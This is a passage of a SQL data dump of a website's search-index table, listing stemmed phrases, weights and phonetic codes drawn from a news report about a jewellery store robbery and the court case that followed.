years',0,1,1.4667,'A1362',1,'en'),(39872,'about me','about me',0,1,1.2667,'A135',1,'en'),(39873,'about me off','about me off',0,1,1.4,'A1351',1,'en'),(39874,'about receiving','about receiving',0,1,1.5,'A1362152',1,'en'),(39875,'about receiving not','about receiving not',0,1,1.6333,'A136215253',1,'en'),(39876,'about the other','about the other',0,1,1.5,'A136',1,'en'),(39877,'abuse','abus',0,0,0.3333,'A120',1,'en'),(39878,'abuse i','abus i',0,1,1.2333,'A120',1,'en'),(39879,'abuse i think','abus i think',0,1,1.4333,'A12352',1,'en'),(39880,'accompanied','accompani',0,0,0.7333,'A25153',1,'en'),(39881,'accompanied by','accompani by',0,1,1.4667,'A251531',1,'en'),(39882,'accompanied by two','accompani by two',0,1,1.6,'A2515313',1,'en'),(39883,'addiction','addict',0,0,0.6,'A3235',1,'en'),(39884,'addiction and','addict and',0,1,1.4333,'A32353',1,'en'),(39885,'addiction and lost','addict and lost',0,1,1.6,'A32353423',1,'en'),(39886,'after heavy','after heavy',0,1,1.3667,'A1361',1,'en'),(39887,'after heavy drinking','after heavy drinking',0,1,1.6667,'A1361365252',1,'en'),(39888,'age of 23','ag of 23',0,1,1.3,'A210',1,'en'),(39889,'alcohol','alcohol',0,0,0.4667,'A424',1,'en'),(39890,'alcohol addiction','alcohol addiction',0,1,1.5667,'A4243235',1,'en'),(39891,'alcohol addiction and','alcohol addiction and',0,1,1.7,'A42432353',1,'en'),(39892,'all the','all the',0,1,1.2333,'A430',1,'en'),(39893,'all the fuel','all the fuel',0,1,1.4,'A4314',1,'en'),(39894,'also ordered','also ordered',0,1,1.4,'A426363',1,'en'),(39895,'also ordered cromarty','also ordered cromarty',0,1,1.7,'A42636326563',1,'en'),(39896,'altercation','alterc',0,0,0.7333,'A436235',1,'en'),(39897,'altercation cromarty','alterc cromarty',0,1,1.6667,'A43623526563',1,'en'),(39898,'altercation cromarty said','alterc cromarty said',0,1,1.8333,'A4362352656323',1,'en'),(39899,'am i','am i',0,1,1.1333,'A500',1,'en'),(39900,'am i going','am i going',0,1,1.3333,'A5252',1,'en'),(39901,'among the chains','among the chains',0,1,1.5333,'A523252',1,'en'),(39902,'an 18','an 18',0,1,1.1667,'A500',1,'en'),(39903,'an 18 month','an 18 month',0,1,1.3667,'A530',1,'en'),(39904,'and 60','and 60',0,1,1.2,'A530',1,'en'),(39905,'and 60 year','and 60 year',0,1,1.3667,'A536',1,'en'),(39906,'and a badly','and a badly',0,1,1.3667,'A53134',1,'en'),(39907,'and a five','and a five',0,1,1.3333,'A531',1,'en'),(39908,'and abbott','and abbott',0,1,1.3333,'A5313',1,'en'),(39909,'and another','and another',0,1,1.3667,'A53536',1,'en'),(39910,'and another 11','and another 11',0,1,1.4667,'A53536',1,'en'),(39911,'and asked','and asked',0,1,1.3,'A5323',1,'en'),(39912,'and asked to','and asked to',0,1,1.4,'A5323',1,'en'),(39913,'and breach','and breach',0,1,1.3333,'A53162',1,'en'),(39914,'and breach of','and breach of',0,1,1.4333,'A531621',1,'en'),(39915,'and did','and did',0,1,1.2333,'A530',1,'en'),(39916,'and did not','and did not',0,1,1.3667,'A5353',1,'en'),(39917,'and escape','and escape',0,1,1.3333,'A5321',1,'en'),(39918,'and escape a','and escape a',0,1,1.4,'A5321',1,'en'),(39919,'and experimented','and experimented',0,1,1.5333,'A5321653',1,'en'),(39920,'and experimented with','and experimented with',0,1,1.7,'A5321653',1,'en'),(39921,'and held','and held',0,1,1.2667,'A5343',1,'en'),(39922,'and held on','and held on',0,1,1.3667,'A53435',1,'en'),(39923,'and i realized','and i realized',0,1,1.4667,'A536423',1,'en'),(39924,'and infiltration','and infiltration',0,1,1.5333,'A535143635',1,'en'),(39925,'and infiltration as','and infiltration as',0,1,1.6333,'A5351436352',1,'en'),(39926,'and is just','and is just',0,1,1.3667,'A5323',1,'en'),(39927,'and leg','and leg',0,1,1.2333,'A5342',1,'en'),(39928,'and leg injuries','and leg injuries',0,1,1.5333,'A53425262',1,'en'),(39929,'and lost','and lost',0,1,1.2667,'A53423',1,'en'),(39930,'and lost his','and lost his',0,1,1.4,'A534232',1,'en'),(39931,'and selfishness','and selfishness',0,1,1.5,'A53241252',1,'en'),(39932,'and selfishness that','and selfishness that',0,1,1.6667,'A532412523',1,'en'),(39933,'and started','and started',0,1,1.3667,'A532363',1,'en'),(39934,'and started walking','and started walking',0,1,1.6333,'A5323634252',1,'en'),(39935,'and that','and that',0,1,1.2667,'A530',1,'en'),(39936,'and that but','and that but',0,1,1.4,'A5313',1,'en'),(39937,'and to theft','and to theft',0,1,1.4,'A5313',1,'en'),(39938,'and told','and told',0,1,1.2667,'A5343',1,'en'),(39939,'and told him','and told him',0,1,1.4,'A53435',1,'en'),(39940,'and was then','and was then',0,1,1.4,'A53235',1,'en'),(39941,'another 11','anoth 11',0,1,1.3333,'A536',1,'en'),(39942,'another 11 cheap','anoth 11 cheap',0,1,1.5333,'A53621',1,'en'),(39943,'anyone beckett','anyon beckett',0,1,1.4667,'A5123',1,'en'),(39944,'anyone beckett said','anyon beckett said',0,1,1.6333,'A512323',1,'en'),(39945,'anywhere\'.said','anywher',0,0,0.9333,'A5623',1,'en'),(39946,'anywhere\'.said she','anywher she',0,1,1.6,'A56232',1,'en'),(39947,'anywhere\'.said she was','anywher she was',0,1,1.7333,'A56232',1,'en'),(39948,'are not going','ar not going',0,1,1.4333,'A653252',1,'en'),(39949,'arm and','arm and',0,1,1.2333,'A653',1,'en'),(39950,'arm and leg','arm and leg',0,1,1.3667,'A65342',1,'en'),(39951,'arm and told','arm and told',0,1,1.4,'A65343',1,'en'),(39952,'arm and was','arm and was',0,1,1.3667,'A6532',1,'en'),(39953,'arm while','arm while',0,1,1.3,'A654',1,'en'),(39954,'arm while asleep','arm while asleep',0,1,1.5333,'A654241',1,'en'),(39955,'armed man','arm man',0,1,1.3,'A6535',1,'en'),(39956,'armed man who','arm man who',0,1,1.4333,'A6535',1,'en'),(39957,'armed thief','arm thief',0,1,1.3667,'A6531',1,'en'),(39958,'armed thief in','arm thief in',0,1,1.4667,'A65315',1,'en'),(39959,'armed thief where','arm thief where',0,1,1.5667,'A65316',1,'en'),(39960,'arrested','arrest',0,0,0.5333,'A623',1,'en'),(39961,'arrested a','arrest a',0,1,1.3333,'A623',1,'en'),(39962,'arrested a short','arrest a short',0,1,1.5333,'A623263',1,'en'),(39963,'as a robbery','as a robbery',0,1,1.4,'A2616',1,'en'),(39964,'as i could','as i could',0,1,1.3333,'A243',1,'en'),(39965,'as snugly','as snugly',0,1,1.3,'A2524',1,'en'),(39966,'as snugly as','as snugly as',0,1,1.4,'A25242',1,'en'),(39967,'asked','ask',0,0,0.3333,'A230',1,'en'),(39968,'asked to','ask to',0,1,1.2667,'A230',1,'en'),(39969,'asked to recieve','ask to recieve',0,1,1.5333,'A23621',1,'en'),(39970,'asleep','asleep',0,0,0.4,'A241',1,'en'),(39971,'asleep on','asleep on',0,1,1.3,'A2415',1,'en'),(39972,'asleep on railway','asleep on railway',0,1,1.5667,'A241564',1,'en'),(39973,'assault','assault',0,0,0.4667,'A243',1,'en'),(39974,'assault anyone','assault anyone',0,1,1.4667,'A2435',1,'en'),(39975,'assault anyone beckett','assault anyone beckett',0,1,1.7333,'A2435123',1,'en'),(39976,'assistance','assist',0,0,0.6667,'A2352',1,'en'),(39977,'assistance still','assist still',0,1,1.5333,'A235234',1,'en'),(39978,'assistance still he','assist still he',0,1,1.6333,'A235234',1,'en'),(39979,'assistant','assist',0,0,0.6,'A2353',1,'en'),(39980,'assistant at','assist at',0,1,1.4,'A2353',1,'en'),(39981,'assistant at robert','assist at robert',0,1,1.6333,'A23536163',1,'en'),(39982,'assistant crown','assist crown',0,1,1.5,'A2353265',1,'en'),(39983,'assistant crown attorney','assist crown attorney',0,1,1.8,'A2353265365',1,'en'),(39984,'at a downtown','at a downtown',0,1,1.4333,'A3535',1,'en'),(39985,'at age','at age',0,1,1.2,'A320',1,'en'),(39986,'at age of','at age of',0,1,1.3,'A321',1,'en'),(39987,'at robert','at robert',0,1,1.3,'A36163',1,'en'),(39988,'at robert brown','at robert brown',0,1,1.5,'A36163165',1,'en'),(39989,'attempt','attempt',0,0,0.4667,'A3513',2,'en'),(39990,'attempt sentence','attempt sentence',0,1,1.5333,'A351325352',1,'en'),(39991,'attempt sentence humphrey','attempt sentence humphrey',0,1,1.8333,'A351325352516',1,'en'),(39992,'attempted','attempt',0,0,0.6,'A3513',1,'en'),(39993,'attempted hesitation','attempt hesitation',0,1,1.6667,'A3513235',1,'en'),(39994,'attempted hesitation were','attempt hesitation were',0,1,1.8333,'A35132356',1,'en'),(39995,'attorney','attornei',0,0,0.5333,'A365',1,'en'),(39996,'attorney kenrick','attornei kenrick',0,1,1.5333,'A3652562',1,'en'),(39997,'attorney kenrick abbott','attornei kenrick abbott',0,1,1.7667,'A365256213',1,'en'),(39998,'august.31','august.31',0,0,0.6,'A230',1,'en'),(39999,'august.31 and','august.31 and',0,1,1.4333,'A2353',1,'en'),(40000,'august.31 and asked','august.31 and asked',0,1,1.6333,'A235323',1,'en'),(40001,'bad when','bad when',0,1,1.2667,'B350',1,'en'),(40002,'bad when i','bad when i',0,1,1.3333,'B350',1,'en'),(40003,'badly','badli',0,0,0.3333,'B340',1,'en'),(40004,'badly scraped','badli scraped',0,1,1.4333,'B342613',1,'en'),(40005,'badly scraped knee','badli scraped knee',0,1,1.6,'B34261325',1,'en'),(40006,'ban he','ban he',0,1,1.2,'B500',1,'en'),(40007,'ban he also','ban he also',0,1,1.3667,'B542',1,'en'),(40008,'be thief','be thief',0,1,1.2667,'B310',1,'en'),(40009,'be thief by','be thief by',0,1,1.3667,'B310',1,'en'),(40010,'became','becam',0,0,0.4,'B250',2,'en'),(40011,'became going','becam going',0,1,1.4,'B25252',1,'en'),(40012,'became going to','becam going to',0,1,1.5,'B252523',1,'en'),(40013,'beckett','beckett',0,0,0.4667,'B230',1,'en'),(40014,'beckett and','beckett and',0,1,1.3667,'B2353',1,'en'),(40015,'beckett and abbott','beckett and abbott',0,1,1.6,'B235313',1,'en'),(40016,'beckett assistant','beckett assistant',0,1,1.5667,'B232353',1,'en'),(40017,'beckett assistant crown','beckett assistant crown',0,1,1.7667,'B232353265',1,'en'),(40018,'beckett said','beckett said',0,1,1.4,'B2323',1,'en'),(40019,'beckett said that','beckett said that',0,1,1.5667,'B2323',1,'en'),(40020,'beckett told','beckett told',0,1,1.4,'B2343',1,'en'),(40021,'beckett told the','beckett told the',0,1,1.5333,'B2343',1,'en'),(40022,'been all','been all',0,1,1.2667,'B540',1,'en'),(40023,'been all the','been all the',0,1,1.4,'B543',1,'en'),(40024,'been highly','been highly',0,1,1.3667,'B524',1,'en'),(40025,'been highly preferred','been highly preferred',0,1,1.7,'B52416163',1,'en'),(40026,'beginer','begin',0,0,0.4667,'B256',1,'en'),(40027,'beginer you','begin you',0,1,1.3667,'B256',1,'en'),(40028,'beginer you have','begin you have',0,1,1.5333,'B2561',1,'en'),(40029,'behind','behind',0,0,0.4,'B530',1,'en'),(40030,'behind while','behind while',0,1,1.4,'B534',1,'en'),(40031,'behind while cromarty','behind while cromarty',0,1,1.7,'B53426563',1,'en'),(40032,'being gang','be gang',0,1,1.3333,'B5252',1,'en'),(40033,'being gang tackled','be gang tackled',0,1,1.6,'B52523243',1,'en'),(40034,'big shame','big shame',0,1,1.3,'B250',1,'en'),(40035,'big shame i','big shame i',0,1,1.3667,'B250',1,'en'),(40036,'blake','blake',0,0,0.3333,'B420',1,'en'),(40037,'blake came','blake came',0,1,1.3333,'B425',1,'en'),(40038,'blake came to','blake came to',0,1,1.4333,'B4253',1,'en'),(40039,'boldness','bold',0,0,0.5333,'B4352',1,'en'),(40040,'boldness and','bold and',0,1,1.4,'B435253',1,'en'),(40041,'boldness and selfishness','bold and selfishness',0,1,1.8,'B435253241252',1,'en'),(40042,'box saturday','box saturday',0,1,1.4,'B2363',1,'en'),(40043,'box saturday in','box saturday in',0,1,1.5,'B23635',1,'en'),(40044,'bracelets in','bracelet in',0,1,1.4,'B624325',1,'en'),(40045,'bracelets in sudbury','bracelet in sudbury',0,1,1.6667,'B6243252316',1,'en'),(40046,'breach','breach',0,0,0.4,'B620',1,'en'),(40047,'breach of','breach of',0,1,1.3,'B621',1,'en'),(40048,'breach of probation','breach of probation',0,1,1.6333,'B6216135',1,'en'),(40049,'break','break',0,0,0.3333,'B620',2,'en'),(40050,'break down','break down',0,1,1.3333,'B6235',1,'en'),(40051,'break down bruised','break down bruised',0,1,1.6,'B62351623',1,'en'),(40052,'brown','brown',0,0,0.3333,'B650',1,'en'),(40053,'brown jewellers','brown jewellers',0,1,1.5,'B652462',1,'en'),(40054,'brown jewellers talked','brown jewellers talked',0,1,1.7333,'B6524623423',1,'en'),(40055,'bruised','bruis',0,0,0.4667,'B623',1,'en'),(40056,'bruised elbow','bruis elbow',0,1,1.4333,'B62341',1,'en'),(40057,'bruised elbow and','bruis elbow and',0,1,1.5667,'B6234153',1,'en'),(40058,'by a worker','by a worker',0,1,1.3667,'B626',1,'en'),(40059,'by beckett','by beckett',0,1,1.3333,'B230',1,'en'),(40060,'by beckett and','by beckett and',0,1,1.4667,'B2353',1,'en'),(40061,'by his','by his',0,1,1.2,'B200',1,'en'),(40062,'by his legs','by his legs',0,1,1.3667,'B242',1,'en'),(40063,'by the arm','by the arm',0,1,1.3333,'B365',1,'en'),(40064,'by the man\'s','by the man',0,1,1.4,'B352',1,'en'),(40065,'by three','by three',0,1,1.2667,'B360',1,'en'),(40066,'by three employees','by three employees',0,1,1.6,'B365142',1,'en'),(40067,'by two','by two',0,1,1.2,'B300',1,'en'),(40068,'by two other','by two other',0,1,1.4,'B360',1,'en'),(40069,'byron','byron',0,0,0.3333,'B650',1,'en'),(40070,'byron cromarty','byron cromarty',0,1,1.4667,'B6526563',1,'en'),(40071,'byron cromarty from','byron cromarty from',0,1,1.6333,'B6526563165',1,'en'),(40072,'called the','call the',0,1,1.3333,'C430',1,'en'),(40073,'called the robbery','call the robbery',0,1,1.6,'C43616',1,'en'),(40074,'came to','came to',0,1,1.2333,'C530',1,'en'),(40075,'came to her','came to her',0,1,1.3667,'C536',1,'en'),(40076,'canada months','canada months',0,1,1.4333,'C53532',1,'en'),(40077,'canada months jail','canada months jail',0,1,1.6,'C535324',1,'en'),(40078,'carat','carat',0,0,0.3333,'C630',1,'en'),(40079,'carat gold','carat gold',0,1,1.3333,'C63243',1,'en'),(40080,'carat gold chain','carat gold chain',0,1,1.5333,'C6324325',1,'en'),(40081,'chain by','chain by',0,1,1.2667,'C510',1,'en'),(40082,'chain by a','chain by a',0,1,1.3333,'C510',1,'en'),(40083,'chain despite','chain despite',0,1,1.4333,'C53213',1,'en'),(40084,'chain despite being','chain despite being',0,1,1.6333,'C53213152',1,'en'),(40085,'chain good','chain good',0,1,1.3333,'C523',1,'en'),(40086,'chain good priced','chain good priced',0,1,1.5667,'C5231623',1,'en'),(40087,'chain providing','chain providing',0,1,1.5,'C5161352',1,'en'),(40088,'chain providing his','chain providing his',0,1,1.6333,'C5161352',1,'en'),(40089,'chain was','chain was',0,1,1.3,'C520',1,'en'),(40090,'chain was not','chain was not',0,1,1.4333,'C5253',1,'en'),(40091,'chains','chain',0,0,0.4,'C520',1,'en'),(40092,'chains and','chain and',0,1,1.3333,'C5253',1,'en'),(40093,'chains and started','chain and started',0,1,1.6,'C52532363',1,'en'),(40094,'charges','charg',0,0,0.4667,'C620',1,'en'),(40095,'charges of','charg of',0,1,1.3333,'C621',1,'en'),(40096,'charges of robbery','charg of robbery',0,1,1.6,'C621616',1,'en'),(40097,'charms canada months','charm canada months',0,1,1.6667,'C65253532',1,'en'),(40098,'childhood','childhood',0,0,0.6,'C430',1,'en'),(40099,'childhood is','childhood is',0,1,1.4,'C432',1,'en'),(40100,'childhood is suffering','childhood is suffering',0,1,1.7333,'C4321652',1,'en'),(40101,'collected minor','collect minor',0,1,1.5,'C42356',1,'en'),(40102,'collected minor arm','collect minor arm',0,1,1.6333,'C423565',1,'en'),(40103,'come through','come through',0,1,1.4,'C5362',1,'en'),(40104,'come through a','come through a',0,1,1.4667,'C5362',1,'en'),(40105,'completing his','complet his',0,1,1.4667,'C514352',1,'en'),(40106,'completing his high','complet his high',0,1,1.6333,'C514352',1,'en'),(40107,'could he','could he',0,1,1.2667,'C430',1,'en'),(40108,'could he was','could he was',0,1,1.4,'C432',1,'en'),(40109,'court of','court of',0,1,1.2667,'C631',1,'en'),(40110,'court of justice','court of justice',0,1,1.5333,'C631232',1,'en'),(40111,'court wednesday','court wednesday',0,1,1.5,'C63523',1,'en'),(40112,'court wednesday that','court wednesday that',0,1,1.6667,'C63523',1,'en'),(40113,'credit','credit',0,0,0.4,'C630',1,'en'),(40114,'credit for','credit for',0,1,1.3333,'C6316',1,'en'),(40115,'credit for his','credit for his',0,1,1.4667,'C63162',1,'en'),(40116,'credits','credit',0,0,0.4667,'C632',1,'en'),(40117,'credits short','credit short',0,1,1.4333,'C63263',1,'en'),(40118,'credits short of','credit short of',0,1,1.5333,'C632631',1,'en'),(40119,'cromarty','cromarti',0,0,0.5333,'C6563',1,'en'),(40120,'cromarty 23','cromarti 23',0,1,1.3667,'C6563',1,'en'),(40121,'cromarty 23 credit','cromarti 23 credit',0,1,1.6,'C6563263',1,'en'),(40122,'cromarty from','cromarti from',0,1,1.4333,'C6563165',1,'en'),(40123,'cromarty from the','cromarti from the',0,1,1.5667,'C65631653',1,'en'),(40124,'cromarty grabbed','cromarti grabbed',0,1,1.5333,'C65632613',1,'en'),(40125,'cromarty grabbed it','cromarti grabbed it',0,1,1.6333,'C65632613',1,'en'),(40126,'cromarty had','cromarti had',0,1,1.4,'C6563',1,'en'),(40127,'cromarty had a','cromarti had a',0,1,1.4667,'C6563',1,'en'),(40128,'cromarty have','cromarti have',0,1,1.4333,'C65631',1,'en'),(40129,'cromarty have a','cromarti have a',0,1,1.5,'C65631',1,'en'),(40130,'cromarty is','cromarti is',0,1,1.3667,'C65632',1,'en'),(40131,'cromarty is a','cromarti is a',0,1,1.4333,'C65632',1,'en'),(40132,'cromarty only','cromarti only',0,1,1.4333,'C656354',1,'en'),(40133,'cromarty only used','cromarti only used',0,1,1.6,'C65635423',1,'en'),(40134,'cromarty said','cromarti said',0,1,1.4333,'C656323',1,'en'),(40135,'cromarty said \'thank','cromarti said thank',0,1,1.6667,'C65632352',1,'en'),(40136,'cromarty squirmed','cromarti squirmed',0,1,1.5667,'C65632653',1,'en'),(40137,'cromarty squirmed free','cromarti squirmed free',0,1,1.7333,'C6563265316',1,'en'),(40138,'cromarty use','cromarti use',0,1,1.4,'C65632',1,'en'),(40139,'cromarty use a','cromarti use a',0,1,1.4667,'C65632',1,'en'),(40140,'cromarty was','cromarti was',0,1,1.4,'C65632',1,'en'),(40141,'cromarty was arrested','cromarti was arrested',0,1,1.7,'C65632623',1,'en'),(40142,'cromarty was on','cromarti was on',0,1,1.5,'C656325',1,'en'),(40143,'cromarty\'s','cromarti',0,0,0.6667,'C65632',1,'en'),(40144,'cromarty\'s left','cromarti left',0,1,1.5,'C65632413',1,'en'),(40145,'cromarty\'s left arm','cromarti left arm',0,1,1.6333,'C6563241365',1,'en'),(40146,'crown','crown',0,0,0.3333,'C650',1,'en'),(40147,'crown attorney','crown attorney',0,1,1.4667,'C65365',1,'en'),(40148,'crown attorney kenrick','crown attorney kenrick',0,1,1.7333,'C653652562',1,'en'),(40149,'custody and','custodi and',0,1,1.3667,'C353',1,'en'),(40150,'custody and another','custodi and another',0,1,1.6333,'C353536',1,'en'),(40151,'databank','databank',0,0,0.5333,'D152',1,'en'),(40152,'databank then','databank then',0,1,1.4333,'D15235',1,'en'),(40153,'databank then of','databank then of',0,1,1.5333,'D152351',1,'en'),(40154,'days following','dai following',0,1,1.4667,'D21452',1,'en'),(40155,'days following your','dai following your',0,1,1.6333,'D214526',1,'en'),(40156,'days in','dai in',0,1,1.2333,'D250',1,'en'),(40157,'days in custody','dai in custody',0,1,1.5,'D2523',1,'en'),(40158,'defence','defenc',0,0,0.4667,'D152',1,'en'),(40159,'defence lawyer','defenc lawyer',0,1,1.4667,'D15246',1,'en'),(40160,'defence lawyer robert','defenc lawyer robert',0,1,1.7,'D15246163',1,'en'),(40161,'described','describ',0,0,0.6,'D2613',1,'en'),(40162,'described beckett','describ beckett',0,1,1.5667,'D2613123',1,'en'),(40163,'described beckett assistant','describ beckett assistant',0,1,1.9,'D26131232353',1,'en'),(40164,'despite','despit',0,0,0.4667,'D213',1,'en'),(40165,'despite being','despit being',0,1,1.4333,'D213152',1,'en'),(40166,'despite being gang','despit being gang',0,1,1.6,'D21315252',1,'en'),(40167,'did not intend','did not intend',0,1,1.4667,'D535353',1,'en'),(40168,'diploma','diploma',0,0,0.4667,'D145',1,'en'),(40169,'diploma come','diploma come',0,1,1.4,'D14525',1,'en'),(40170,'diploma come through','diploma come through',0,1,1.6667,'D14525362',1,'en'),(40171,'dna databank','dna databank',0,1,1.4,'D53152',1,'en'),(40172,'dna databank then','dna databank then',0,1,1.5667,'D5315235',1,'en'),(40173,'do you get','do you get',0,1,1.3333,'D230',2,'en'),(40174,'doing this','do this',0,1,1.3333,'D5232',1,'en'),(40175,'doing this and','do this and',0,1,1.4667,'D523253',1,'en'),(40176,'door','door',0,0,0.2667,'D600',3,'en'),(40177,'door and','door and',0,1,1.2667,'D653',1,'en'),(40178,'door and i','door and i',0,1,1.3333,'D653',1,'en'),(40179,'door richard','door richard',0,1,1.4,'D6263',1,'en'),(40180,'door richard remembered','door richard remembered',0,1,1.7667,'D626365163',1,'en'),(40181,'down bruised','down bruised',0,1,1.4,'D51623',1,'en'),(40182,'down bruised elbow','down bruised elbow',0,1,1.6,'D5162341',1,'en'),(40183,'down this','down this',0,1,1.3,'D532',1,'en'),(40184,'down this guy\',','down this guy',0,1,1.5,'D532',1,'en'),(40185,'downtown','downtown',0,0,0.5333,'D535',1,'en'),(40186,'downtown jewelry','downtown jewelry',0,1,1.5333,'D535246',1,'en'),(40187,'downtown jewelry store','downtown jewelry store',0,1,1.7333,'D535246236',1,'en'),(40188,'drinking','drink',0,0,0.5333,'D65252',1,'en'),(40189,'drinking however','drink however',0,1,1.5333,'D6525216',1,'en'),(40190,'drinking however he','drink however he',0,1,1.6333,'D6525216',1,'en'),(40191,'drug','drug',0,0,0.2667,'D620',1,'en'),(40192,'drug abuse','drug abuse',0,1,1.3333,'D6212',1,'en'),(40193,'drug abuse i','drug abuse i',0,1,1.4,'D6212',1,'en'),(40194,'earnestly','earnestli',0,0,0.6,'E65234',1,'en'),(40195,'earnestly wounded','earnestli wounded',0,1,1.5667,'E6523453',1,'en'),(40196,'earnestly wounded august.31','earnestli wounded august.31',0,1,1.9,'E652345323',1,'en'),(40197,'elbow','elbow',0,0,0.3333,'E410',1,'en'),(40198,'elbow and','elbow and',0,1,1.3,'E4153',1,'en'),(40199,'elbow and a','elbow and a',0,1,1.3667,'E4153',1,'en'),(40200,'else am','els am',0,1,1.2333,'E425',1,'en'),(40201,'else am i','els am i',0,1,1.3,'E425',1,'en'),(40202,'employee','employe',0,0,0.5333,'E514',1,'en'),(40203,'employee on','employe on',0,1,1.3667,'E5145',1,'en'),(40204,'employee on the','employe on the',0,1,1.5,'E51453',1,'en'),(40205,'employees at','employe at',0,1,1.4,'E51423',1,'en'),(40206,'employees at a','employe at a',0,1,1.4667,'E51423',1,'en'),(40207,'employees who','employe who',0,1,1.4333,'E5142',1,'en'),(40208,'employees who tried','employe who tried',0,1,1.6333,'E5142363',1,'en'),(40209,'escape','escap',0,0,0.4,'E210',1,'en'),(40210,'escape a','escap a',0,1,1.2667,'E210',1,'en'),(40211,'escape a new','escap a new',0,1,1.4,'E215',1,'en'),(40212,'escape and','escap and',0,1,1.3333,'E2153',1,'en'),(40213,'escape and did','escap and did',0,1,1.4667,'E2153',1,'en'),(40214,'eventually','eventu',0,0,0.6667,'E1534',1,'en'),(40215,'eventually two','eventu two',0,1,1.4667,'E15343',1,'en'),(40216,'eventually two of','eventu two of',0,1,1.5667,'E153431',1,'en'),(40217,'excuse','excus',0,0,0.4,'E200',1,'en'),(40218,'excuse me','excus me',0,1,1.3,'E250',1,'en'),(40219,'excuse me you','excus me you',0,1,1.4333,'E250',1,'en'),(40220,'experimented','experi',0,0,0.8,'E21653',1,'en'),(40221,'experimented with','experi with',0,1,1.5667,'E21653',1,'en'),(40222,'experimented with leave','experi with leave',0,1,1.7667,'E2165341',1,'en'),(40223,'extremely serious','extrem serious',0,1,1.5667,'E23654262',1,'en'),(40224,'extremely serious offence','extrem serious offence',0,1,1.8333,'E23654262152',1,'en'),(40225,'facing','face',0,0,0.4,'F252',1,'en'),(40226,'facing charges','face charges',0,1,1.4667,'F25262',1,'en'),(40227,'facing charges of','face charges of',0,1,1.5667,'F252621',1,'en'),(40228,'felt bad','felt bad',0,1,1.2667,'F4313',1,'en'),(40229,'felt bad when','felt bad when',0,1,1.4333,'F43135',1,'en'),(40230,'female','femal',0,0,0.4,'F540',1,'en'),(40231,'female employees','femal employees',0,1,1.5333,'F545142',1,'en'),(40232,'female employees who','femal employees who',0,1,1.6667,'F545142',1,'en'),(40233,'feminine employee','feminin employee',0,1,1.5667,'F514',1,'en'),(40234,'feminine employee on','feminin employee on',0,1,1.6667,'F5145',1,'en'),(40235,'few credits','few credits',0,1,1.3667,'F2632',1,'en'),(40236,'few credits short','few credits short',0,1,1.5667,'F263263',1,'en'),(40237,'few days','few days',0,1,1.2667,'F320',2,'en'),(40238,'few days following','few days following',0,1,1.6,'F321452',1,'en'),(40239,'fibromyalgia','fibromyalgia',0,0,0.8,'F6542',1,'en'),(40240,'fibromyalgia syndrome','fibromyalgia syndrome',0,1,1.7,'F65425365',1,'en'),(40241,'fibromyalgia syndrome for','fibromyalgia syndrome for',0,1,1.8333,'F6542536516',1,'en'),(40242,'figured \'how','figur how',0,1,1.4,'F263',1,'en'),(40243,'figured \'how else','figur how else',0,1,1.5667,'F26342',1,'en'),(40244,'five year','five year',0,1,1.3,'F600',1,'en'),(40245,'five year pistols','five year pistols',0,1,1.5667,'F612342',1,'en'),(40246,'fled','fled',0,0,0.2667,'F430',1,'en'),(40247,'fled using','fled using',0,1,1.3333,'F43252',1,'en'),(40248,'fled using the','fled using the',0,1,1.4667,'F432523',1,'en'),(40249,'flip side','flip side',0,1,1.3,'F4123',1,'en'),(40250,'flip side grabbed','flip side grabbed',0,1,1.5667,'F41232613',1,'en'),(40251,'following your','follow your',0,1,1.4667,'F4526',1,'en'),(40252,'following your altercation','follow your altercation',0,1,1.8667,'F4526436235',1,'en'),(40253,'foot','foot',0,0,0.2667,'F300',1,'en'),(40254,'foot 1','foot 1',0,1,1.2,'F300',1,'en'),(40255,'foot 1 105','foot 1 105',0,1,1.3333,'F300',1,'en'),(40256,'for about','for about',0,1,1.3,'F613',1,'en'),(40257,'for about 20','for about 20',0,1,1.4,'F613',1,'en'),(40258,'for his','for his',0,1,1.2333,'F620',1,'en'),(40259,'for his 26','for his 26',0,1,1.3333,'F620',1,'en'),(40260,'for their','for their',0,1,1.3,'F636',1,'en'),(40261,'for their funds','for their funds',0,1,1.5,'F6361532',1,'en'),(40262,'force','forc',0,0,0.3333,'F620',2,'en'),(40263,'force in','forc in',0,1,1.2667,'F625',1,'en'),(40264,'force in trying','forc in trying',0,1,1.5,'F6253652',1,'en'),(40265,'fortunate the','fortun the',0,1,1.4333,'F6353',1,'en'),(40266,'fortunate the ladies','fortun the ladies',0,1,1.6667,'F6353432',1,'en'),(40267,'free and','free and',0,1,1.2667,'F653',1,'en'),(40268,'free and escape','free and escape',0,1,1.5,'F65321',1,'en'),(40269,'free with','free with',0,1,1.3,'F630',1,'en'),(40270,'free with a','free with a',0,1,1.3667,'F630',1,'en'),(40271,'from people','from people',0,1,1.3667,'F6514',1,'en'),(40272,'from people who','from people who',0,1,1.5,'F6514',1,'en'),(40273,'from the prisoner\'s','from the prisoner',0,1,1.6333,'F653162562',1,'en'),(40274,'from the shop','from the shop',0,1,1.4333,'F65321',1,'en'),(40275,'fuel she','fuel she',0,1,1.2667,'F420',1,'en'),(40276,'fuel she needed','fuel she needed',0,1,1.5,'F4253',1,'en'),(40277,'funds','fund',0,0,0.3333,'F532',2,'en'),(40278,'funds who','fund who',0,1,1.3,'F532',1,'en'),(40279,'funds who was','fund who was',0,1,1.4333,'F532',1,'en'),(40280,'gang','gang',0,0,0.2667,'G520',1,'en'),(40281,'gang tackled','gang tackled',0,1,1.4,'G523243',1,'en'),(40282,'gang tackled by','gang tackled by',0,1,1.5,'G5232431',1,'en'),(40283,'gave','gave',0,0,0.2667,'G100',1,'en'),(40284,'gave cromarty','gave cromarty',0,1,1.4333,'G126563',1,'en'),(40285,'gave cromarty 23','gave cromarty 23',0,1,1.5333,'G126563',1,'en'),(40286,'genetic','genet',0,0,0.4667,'G532',1,'en'),(40287,'genetic sample','genet sample',0,1,1.4667,'G532514',1,'en'),(40288,'genetic sample to','genet sample to',0,1,1.5667,'G5325143',1,'en'),(40289,'get pandora','get pandora',0,1,1.3667,'G31536',2,'en'),(40290,'get pandora bracelets','get pandora bracelets',0,1,1.7,'G31536162432',2,'en'),(40291,'gets','get',0,0,0.2667,'G320',2,'en'),(40292,'gets jail','get jail',0,1,1.3,'G324',1,'en'),(40293,'gets jail a','get jail a',0,1,1.3667,'G324',1,'en'),(40294,'gets jail armed','get jail armed',0,1,1.5,'G324653',1,'en'),(40295,'going anywhere\'.said','go anywhere',0,1,1.6667,'G525623',1,'en'),(40296,'going anywhere\'.said she','go anywhere she',0,1,1.8,'G5256232',1,'en'),(40297,'going to tear','go to 